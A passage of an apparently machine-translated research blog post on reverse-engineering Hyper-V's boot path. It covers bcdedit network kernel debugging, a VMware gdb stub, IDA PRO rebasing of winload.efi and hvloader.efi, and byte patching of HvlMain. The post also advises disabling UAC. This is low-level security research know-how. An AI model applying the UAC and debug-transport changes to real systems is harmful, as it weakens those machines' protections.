<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="311" src="https://lh3.googleusercontent.com/BI8vtzReEJDMmLASqaie9wH9HNGbIzd2P7iVCbAcyxlBHZFNQP32v5B1vFWIDJDVIN--udKR-hui0dj9w96V5jTSeRy7eBKmt4YrNJLphDRql78uaM2oX1uRyg7Vefos_mwUw6Fe16iOLat4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="322" /></span></div>
</td></tr>
</tbody></table>
</div>
<br /><ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in Windows 8.1 run following commands</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set dbgtransport kdvm.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set {default} loadoptions host_ip="1.2.3.4",host_port=50011,encryption_key="1.2.3.4"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set debug on</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<br /></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restart the OS.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">specify the parameters of the script hyperv-dbg.ps1 (the script in the archive has been adapted for Windows Server 2012 R2)" </span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh4.googleusercontent.com/WFrcS3nNMSr--iOYemRia5HaaRRUizBR10j8P2YbLuWz4pWUqJb0IkIeXsURs10azTHYguWbdABHVmqTThTi9QfzMbFL5TfTKe1qF0d2VaxF0RvAIb09VbpMQgnCfR_GSrsf80SSsKlbXMzk" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="390" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run the script hyperv-dbg.ps1 (run through the „Run as Administrator“, or disable UAC, run gpedit.msc and set Computer configuration \ Windows Settings \ Security Settings \ Local Policies \ Security Options \ User Account Control: Run All administrators in Admin Approval Mode to Disable) in the root-section</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start WinDBG: </span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.35pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG -k net:port=50011,target=127.0.0.1,key=1.2.3.4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">execute the command </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">break, </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then the debugger will stop inside the guest OS:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="126" src="https://lh3.googleusercontent.com/DObjgwRm58YEUA_FbNs7T5UimUG0NLjT51jU4L69Qw8Ii5Hi2ZhjzDIZLkbPk85bfYIp0GbIl3OkR5r9qAt7BPcMQbn3tmrM5Y2FjrzZ16jM4mOVlYC-N9mzc2olVQ34bxuiexOOI_1ZCtEw" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="335" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also, for the virtual machine VMware, where Windows Server 2016 TP2 is installed on, the gdb-debugger must be enabled. To do this, vmx-file of this machine, you have to add the line</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64 = "TRUE"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.hideBreakpoints= "TRUE"</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3. Loading the hypervisor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The research used hvloader.efi (10.0.10011.0) and hvix64.exe (10.0.10074.0). Before debugging load winload.exe into IDA PRO, choose Debugger -> Select Debugger -> GDB, in the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Options</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> to specify the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host name</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 127.0.0.1 and port 8864.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="188" src="https://lh3.googleusercontent.com/Fz4DDQKPQnuk7OjvQPAvI4K8Qp0rQX3eSNA2f8ebdx_r7a1wuZt8jpRqmxAmmqh8Cqj8PgrBtpmmh-ac72ysWerbCLvF8mnHz7DM2tKjYpz2CBBrCoaqRt7_X09DKSz2soNP7BGwQ9Mq8OSv" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="425" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thanks to the previously installed boot loader options </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootdebug on</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> an early connection to download winload.efi, which produces the hypervisor launch this after the start of the OS, you need to:</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> run WinDBG:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 74.7pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k net:port=50002,key=</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">pv1l8rzwhxhz.2vpkq86oc8zwg.tly17iosgzm8.1h7r18svpji4p</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">These circumstances must occur within the function winload! DebugService2</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -42px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">find download address of winload.efi</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> lm</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start end module name</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`00939000 00000000`00aae000 winload (pdb symbols)</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run IDA PRO and load the previously analyzed module winload.efi, choose Debugger -> attach to process -> attach to process started on target, and after stopping run Edit -> Segments -> Rebase program, specified in the Image base load address winload.efi (0x00939000) and save it in IDA PRO. When loading winload.exe ASLR is not used, so the load address will not change, when you restart the operating system and downloading to the IDA PRO winload.efi will be immediately posted to the correct address.</span></div>
</li>
</ul>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -42px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">put in IDA PRO a breakpoint on winload!OslArchHypervisorSetup and continue debugging (F9). Also continue debugging in WinDBG:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> g</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Winload checks whether the given parameter loader hypervisorlaunchtype (0x250000f0) is.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="277" src="https://lh3.googleusercontent.com/eg2mpgwdbTPSom9kYq28RURrlJKxKyAzp_eeZ_FU-nL_LpAfTI9XRaYVVDTIxOsP2QsGhUBNT3JX_xbHafAXx_GHPpcZjUrXkxGDr-ARR_6aipJbUVEY30SLTkFdAUEp4bmWUdu0KYthrNVx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="441" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the parameter is specified and its value is 1 (Auto), the function call HvlpLaunchHvLoader-> BlImgStartBootApplication->ImgArchEfiStartBootApplication that loads and passes the control module hvloader.efi which will have to download the file of the hypervisor hvix64.exe and prepare it for future work.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="72" src="https://lh4.googleusercontent.com/J-3ObIod0Dwi979_BV-a3qOc-_jsT8to_88u0N1aQkj_vJwzHh7YMphDvDg4jlvDONF2ok8pQOQj50PO6V6Y7WYNvSoiZKU0tciwhJjzqLoE9vBYkynt_6BkMPBhp-Qfju_0huRJMp-5Nmll" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="443" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function BlBdStop shuts off the WinDBG, but you debug through gdb in VMware, which cannot be prevented.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function Archpx64TransferTo64BitApplicationAsm is used to give control to the hvlMain from hvloader.efi</span><span style="background-color: transparent; color: #0f0f5f; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the address of the function hvlMain is in ArchpChildAppEntryRoutine).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="334" src="https://lh5.googleusercontent.com/NffJooeshemAiIPVg9qdnEhpvF2gqUZfxgHW97A_AKJ0capZ6S7ts61rtXr6AdpyXhnvQMxT2ENzGeko86zFHha60eXn4zK6Xf6Lhg5-npOLtwxZsZk5PUtPgVAVSscj8L1r749eQDVaspC4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="402" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For properly debugging hvloader.efi, you need replace the first instruction of HvlMain to EB FE 90, that fix the code and will provide an opportunity to restart IDA PRO, download hvloader.efi and reconnect gdb-debugger to VMware. Then you must return the changed bytes in place and perform rebase module. To improve the speed of operations you can apply changes to code with simple scripts written in python (PatchHvLoader.py and RestoreHvLoader.py). Base load hvloader.efi does not change and always has been 0x4BA000, so that, by analogy with winload.efi once performed rebase, the base remains, and on subsequent connections debugger module is located to the right address without performing additional operations.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvloader.efi you should pay attention to the function BtPrepareHypervisorLaunch (called from HvlMain->HvlpPrepareHypervisorForLaunch), which does basic operations for loading the hypervisor. Shortly before calling this function, you can see that the function BtLoadUpdateDll, which loads the library processor microcode updates mcupdate_GenuineIntel.dll. The functions BtLoadUpdateDll and BtPrepareHypervisorLaunch first performing BtpIdentifyPlatform, which is determined by the manufacturer of the processor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="361" src="https://lh3.googleusercontent.com/L9wn9ExJUWHprgTE2rmnR9_GHmqN8D0zb12F4CudX504byZxUb99kwQXVBq9yxgHFrEJ7KoiXa0qinHJ7ECZfjyMAQArMBdl0uX4XMcJjI01qRhid-B5IKGF4acT5sMlJIWgG3V4wikyFeM7" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="439" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and returns a pointer to a structure BtpPlatformTable and the names of uploaded files.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="83" src="https://lh5.googleusercontent.com/x-YLtQ9umh-H5LBhSB4KSco4jAn6JuvdU_DhNdbpHHee3RotnuDsFXDWU8p4uIkY_ihS9jI6FYrpwGSR5e58GgTQMRjfdVAnbu32Pfa5A6qRH7yjOFzNRrUbYyIyyZKAuX2OwcjI97WN2mlo" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="396" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Pointers to function VmxDetect and SvmDetect need only BtPrepareHypervisorLaunch. These functions are called immediately after BtpIdentityPlatform depending on the platform </span><span style="background-color: transparent; color: #0f0f5f; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(VmxDetect for Intel and SvmDetect for AMD</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="69" src="https://lh6.googleusercontent.com/XIHq9SYzrQm2xKIik85d67bj1Bte8Au2Wkk1YOgVYy1k59Nr3XHCu2r_Ji_ce0LPglBcRBF0m3lr83eX88VvDfBQB9nG6TZvvNdD-869x_Yxu1QT7q55zXJ6wnOlk6DnYlB3UqbxXNh3PA1z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="368" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VmxDetect, for example, determines the capabilities of the processor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="200" src="https://lh6.googleusercontent.com/O7Zzt2TuvXDTcx25T1GJqJGtp2v27H4XV9OBibxa0mqB1sMTcm7FAwppKFaDZpApVvRq6rmmErPh-iHyTiuxzOVICGs0ae6zUYbgiMPH8PMT1fj_vPQYYFsgELNp0IQNzL0LujZhhAgG_50j" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="425" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="163" src="https://lh3.googleusercontent.com/2X-fP-HRQwGnu3wINNQneMZmvbX9n4NVO098CyeYcH19wmlXRMTqZsMWpfHv4nM53eofR4Lmb8snRbTojj4Qcge-HA5mWKjnAyZVQ5tztLBw7CAodxTGi1Cyhfq89eTkE7QKDO0Qjdk8Lhx1" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="524" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and returns a pointer to the next platform specific function VmxValidate (SvmDetect returns SvmValidate), etc.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally, attention may be drawn to the calculation of the random offset for the load address of the hypervisor 0xFFFFF800 00000000 and its subsequent displacement by calling BtpLayoutHvImage.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also BtPrepareHypervisorLaunch call BtpLayoutKdExtension which load kdstub.dll</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="147" src="https://lh4.googleusercontent.com/6JWL60xTIgzXM7uC82xeEd392qyQ4yuYayjNkkMW33WMmFwNQ_xh4wS0mCUoVp8icbPlzZoXNc7ag-WPqe4IZFOGD5Vf4xWN-HjVjbIgsxnDzcgFIG7FiKcuiU3CkAg9PirQfKbrZjYg3HFq" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="258" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The structure BtpAllocateAndBuildLoaderBlock is filled with BtpLoaderBlockPages (HvlpLoaderBlock in winload), which later will be used to transfer control to the start of the procedure hvix64.exe.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Rebase Messages </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rebase Hv by: 6c25000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
